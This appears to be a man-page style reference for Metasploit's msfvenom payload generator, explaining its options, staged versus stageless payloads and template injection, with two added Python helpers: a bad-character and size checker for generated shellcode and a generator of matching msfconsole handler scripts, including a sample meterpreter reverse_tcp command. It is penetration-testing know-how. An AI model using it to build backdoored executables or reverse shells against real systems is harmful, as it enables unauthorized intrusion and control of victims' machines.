msfvenom
Generate Metasploit payloads
TLDR
List payloads
List formats
Show payload options
Create an ELF binary with a reverse TCP handler
Create an EXE binary with a reverse TCP handler
Create a raw Bash with a reverse TCP handler
SYNOPSIS
msfvenom [options]
PARAMETERS
-p, --payload <payload>
Selects the payload to generate (e.g. windows/x64/meterpreter/reverse_tcp). Payload-specific options such as LHOST and LPORT are passed after it as KEY=VALUE pairs; --list-options together with -p prints the options a payload accepts.
-l, --list [module_type]
Lists available modules of the given type (payloads, encoders, nops, platforms, archs, formats, or all). If no type is given, all types are listed.
-n, --nopsled <length>
Prepends a NOP sled of the given length (in bytes) to the payload.
-f, --format <format>
Output format: either an executable container (exe, elf, dll, macho, ...) or a transform that emits the bytes as source (raw, c, python, csharp, hex, ...). -l formats lists them all.
-e, --encoder <encoder>
Encoder to apply (e.g. x86/shikata_ga_nai). Encoders exist to strip bad characters from the payload; they are heavily signatured and give little antivirus evasion on their own.
-a, --arch <arch>
Target architecture (x86, x64, ...); normally inferred from the payload name.
-o, --out <path>
Writes the generated payload to the given file instead of stdout.
-s, --space <length>
Maximum size of the resulting payload in bytes; generation fails if the (encoded) result is larger.
-b, --bad-chars <list>
Bytes the payload must not contain, written as '\x00\x0a\x0d'. If no encoder is chosen, msfvenom tries encoders until one removes them.
-i, --iterations <count>
Number of times to run the encoder. Each pass wraps the result in another decoder stub, so the payload grows and the output must still be checked against -b and -s.
--platform <platform>
Payload platform (windows, linux, ...); normally inferred from the payload name.
-v, --var-name <name>
Variable name used in source-style output formats such as c, python and csharp (default buf).
-x, --template <path>
Injects the payload into a custom executable instead of the default stub.
-k, --keep
With -x, keeps the template's original behaviour by running the payload in a new thread, so the host program still works as before.
-h, --help
Displays help information.
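The -b and -s options above constrain the output, and after encoding (especially with several -i iterations) it is worth checking that the constraints actually held before the payload goes anywhere near a target. The following is an added example, not part of msfvenom or Metasploit: it parses the text that msfvenom writes with -f python (both the older str form and the current bytes form), reassembles the shellcode, and reports bad-character hits and size. The SAMPLE bytes are constructed to look like that output and are not real shellcode; the function names are the example's own.

```python
"""Check msfvenom -f python output against -b (bad chars) and -s (space).

Added example, not part of msfvenom. Reads the python transform format, rebuilds
the bytes, and reports which listed bad bytes occur and whether the size fits.
"""
import ast
import re
import sys

# One `buf += b"..."` (or legacy `buf += "..."`) line of msfvenom -f python output.
LINE_RE = re.compile(r'''^\s*buf\s*\+?=\s*(b?"(?:[^"\\]|\\.)*"|b?'(?:[^'\\]|\\.)*')\s*$''')

# Constructed sample in the shape `msfvenom -f python` emits (NOT real shellcode).
SAMPLE = r'''buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
buf += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
'''


def parse_python_format(text):
    """Reassemble the shellcode bytes from msfvenom's python transform output."""
    out = bytearray()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip comments and anything that is not a buf line
        lit = ast.literal_eval(m.group(1))
        if isinstance(lit, str):  # legacy str form: one character per byte
            lit = lit.encode("latin-1")
        out += lit
    return bytes(out)


def parse_badchar_spec(spec):
    r"""Turn a -b argument such as '\x00\x0a\x0d' into the byte values it names."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", spec))


def find_bad_chars(payload, bad):
    """Map each bad byte that occurs in the payload to the offsets where it appears."""
    hits = {}
    for off, byte in enumerate(payload):
        if byte in bad:
            hits.setdefault(byte, []).append(off)
    return hits


def check_payload(text, badchar_spec, max_space=None):
    """Report size, whether it fits -s, and any -b violations for msfvenom python output."""
    payload = parse_python_format(text)
    hits = find_bad_chars(payload, parse_badchar_spec(badchar_spec))
    fits = max_space is None or len(payload) <= max_space
    return {"size": len(payload), "fits": fits, "bad": hits, "ok": fits and not hits}


if __name__ == "__main__":
    # Usage: python3 check_payload.py shellcode.py '\x00\x0a\x0d' [max_space]
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE
    spec = sys.argv[2] if len(sys.argv) > 2 else r"\x00\x0a\x0d"
    space = int(sys.argv[3]) if len(sys.argv) > 3 else None
    report = check_payload(src, spec, space)
    print(f"size={report['size']} fits={report['fits']} ok={report['ok']}")
    for byte, offsets in sorted(report["bad"].items()):
        print(f"  bad byte 0x{byte:02x} at offsets {offsets}")
```

Run it on the file produced by msfvenom -f python -o shellcode.py with the same bad-character list and size limit you passed to msfvenom; a non-empty "bad" map or fits=False means the encoder did not deliver what the options asked for and the payload should be regenerated rather than used.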
DESCRIPTION
msfvenom is Metasploit's standalone payload generator; it replaced the separate msfpayload and msfencode tools of earlier releases. It builds payloads (shellcode, scripts and executables) for many operating systems and architectures, applies encoders to them, and writes the result in a chosen output format.
Penetration testers and security researchers use it to build payloads, inject them into existing executables, and produce standalone binaries, all through one interface for generating, encoding and outputting. Payload names and options are the same ones msfconsole uses, so the handler for a generated payload is configured with exactly the values passed to msfvenom.
CAVEATS
Payloads generated with msfvenom are widely signatured and are usually detected by antivirus software. Encoders were designed to remove bad characters, not to evade detection, and stacking iterations of an encoder does little against modern engines; evasion depends on the template, format and delivery chosen for the target rather than on the encoder. Use the bad-character and space options only once you know what the target actually restricts, and verify the output against those limits before use. Not every option is compatible with every payload or format (a template given with -x, for example, only makes sense for executable formats), and the handler must be started with exactly the payload, LHOST and LPORT used at generation time.
UNDERSTANDING PAYLOAD STAGES
Many payloads are staged: the piece msfvenom emits is a small stager that only connects back (or listens), and the handler then sends the larger stage (for example a full Meterpreter) over that connection. This keeps the initial payload small enough for tight buffers and bad-character constraints, at the cost of requiring a live Metasploit handler to complete. Staged payloads are named with a slash between stage and stager (windows/meterpreter/reverse_tcp); the stageless variants join them with an underscore (windows/meterpreter_reverse_tcp) and carry everything in one larger blob. msfvenom can generate either form; the stage itself is delivered by the handler in msfconsole, not by msfvenom.
CUSTOMIZING PAYLOADS
Payload-specific options are given after the payload name as KEY=VALUE pairs, most commonly LHOST (the address the target connects back to) and LPORT (the port), plus any advanced options the payload exposes; --list-options shows them with their defaults. Getting these right for the target network (a reachable address, an egress port that is allowed) matters more than any encoder choice. Use -o to write the result to a file; without it the payload goes to stdout.
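Both the staging discussion and the option handling above come down to one requirement: the handler in msfconsole must be started with the same payload name, LHOST and LPORT that were given to msfvenom, or a staged payload will connect to nothing that can serve its stage. The following is an added example, not part of Metasploit: it takes the msfvenom command line that was actually run, extracts the payload and KEY=VALUE options, and emits a resource script for exploit/multi/handler so the values cannot drift between the two tools. The "reverse" substring check used to demand LHOST is the example's own heuristic; the rc commands themselves (use, set, exploit -j -z) are standard msfconsole syntax.

```python
"""Derive the msfconsole handler resource script from an msfvenom command line.

Added example, not part of Metasploit. Parses `-p PAYLOAD` and KEY=VALUE options
from the command that generated the payload and writes the matching
exploit/multi/handler setup, so payload, LHOST and LPORT stay in sync.
"""
import re
import shlex

# Datastore option as passed to msfvenom, e.g. LHOST=10.0.0.5
OPTION_RE = re.compile(r"^([A-Za-z][A-Za-z0-9_]*)=(.+)$")


def parse_msfvenom_cmd(cmd):
    """Extract the payload name and KEY=VALUE options from an msfvenom command."""
    argv = shlex.split(cmd)
    payload = None
    options = {}
    i = 0
    while i < len(argv):
        tok = argv[i]
        if tok in ("-p", "--payload") and i + 1 < len(argv):
            payload = argv[i + 1]
            i += 2
            continue
        if tok.startswith("--payload="):
            payload = tok.split("=", 1)[1]
            i += 1
            continue
        m = OPTION_RE.match(tok)
        if m:
            options[m.group(1).upper()] = m.group(2)
        i += 1
    if payload is None:
        raise ValueError("no -p/--payload in command line")
    return {"payload": payload, "options": options}


def handler_rc(cmd, exit_on_session=False):
    """Build an exploit/multi/handler resource script for the given msfvenom command."""
    parsed = parse_msfvenom_cmd(cmd)
    opts = parsed["options"]
    if "LPORT" in opts:
        port = int(opts["LPORT"])
        if not 1 <= port <= 65535:
            raise ValueError(f"LPORT out of range: {port}")
    # Heuristic (example's own): reverse_* payloads call back, so the handler needs LHOST.
    if "reverse" in parsed["payload"] and "LHOST" not in opts:
        raise ValueError("reverse payload needs LHOST so the handler knows where to listen")
    lines = ["use exploit/multi/handler", f"set PAYLOAD {parsed['payload']}"]
    for key in sorted(opts):
        lines.append(f"set {key} {opts[key]}")
    # Keep the handler up for further callbacks and run it as a background job.
    lines.append(f"set ExitOnSession {'true' if exit_on_session else 'false'}")
    lines.append("exploit -j -z")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Constructed command line for illustration; substitute the one you really ran.
    CMD = "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe -o shell.exe"
    print(handler_rc(CMD), end="")
```

Save the output as handler.rc and start it with msfconsole -q -r handler.rc before the payload runs on the target. Because the payload string is copied verbatim, a staged name (slash) yields a handler that serves the stage and a stageless name (underscore) yields one that simply accepts the session; mixing the two is the most common reason a callback arrives and then dies.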
HISTORY
msfvenom was introduced as a replacement for the separate msfpayload and msfencode tools in Metasploit, which were removed in 2015 once it had matured. The change streamlined payload generation by putting generation, encoding and output into one command.
Since then it has been extended with new payloads, encoders, output formats and options (templates, encryption, stageless payloads) while keeping the same single interface, so the payload names and options it accepts remain those of the Metasploit modules used by msfconsole.
SEE ALSO
msfconsole(1)